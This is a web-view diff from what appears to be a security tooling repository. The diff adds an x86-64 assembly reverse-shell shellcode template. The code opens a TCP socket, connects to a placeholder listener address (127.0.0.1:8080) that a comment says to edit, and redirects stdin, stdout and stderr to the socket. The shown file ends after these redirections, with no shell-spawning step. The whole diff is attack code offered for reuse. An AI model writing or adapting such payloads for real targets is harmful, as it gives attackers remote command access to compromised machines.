summaryrefslogtreecommitdiffstats
path: root/templates/shellcode/examples/tcp64.asm
diff options
context:
space:
mode:
Diffstat (limited to 'templates/shellcode/examples/tcp64.asm')
-rw-r--r--templates/shellcode/examples/tcp64.asm49
1 files changed, 49 insertions, 0 deletions
diff --git a/templates/shellcode/examples/tcp64.asm b/templates/shellcode/examples/tcp64.asm
new file mode 100644
index 0000000..1ec3bc8
--- /dev/null
+++ b/templates/shellcode/examples/tcp64.asm
@@ -0,0 +1,49 @@
+; Based loosely on https://systemoverlord.com/2018/10/30/understanding-shellcode-the-reverse-shell.html
+
+; socket(AF_INET, SOCK_STREAM, IPPROTO_IP)
+xor rax, rax
+xor rdi, rdi
+xor rsi, rsi
+xor rdx, rdx
+mov al, 41
+mov dil, 2
+mov sil, 1
+syscall
+
+; !! Edit this section to connect back to your listener !!
+;
+; struct sockaddr_in { // Struct size: 16
+; short int sin_family; // AF_INET (2)
+; unsigned short int sin_port; // Set to 8080 below
+; struct in_addr sin_addr; // Set to 127.0.0.1 below
+; unsigned char sin_zero[8];
+; };
+;
+; struct in_addr { // Struct size: 4
+; uint32_t s_addr;
+; };
+xor rbx, rbx
+push rbx
+mov rbx, 0x0100007f901f0002
+push rbx
+
+; connect(fd, sockaddr, sizeof sockaddr)
+mov rdi, rax
+mov rsi, rsp
+mov dl, 16
+xor rax, rax
+mov al, 42
+syscall
+
+; dup2(fd, stdin)
+; dup2(fd, stdout)
+; dup2(fd, stderr)
+xor rsi, rsi
+mov al, 33
+syscall
+mov sil, 1
+mov al, 33
+syscall
+mov sil, 2
+mov al, 33
+syscall
cgit-1.2.3-r5 | srcnode v0.4.0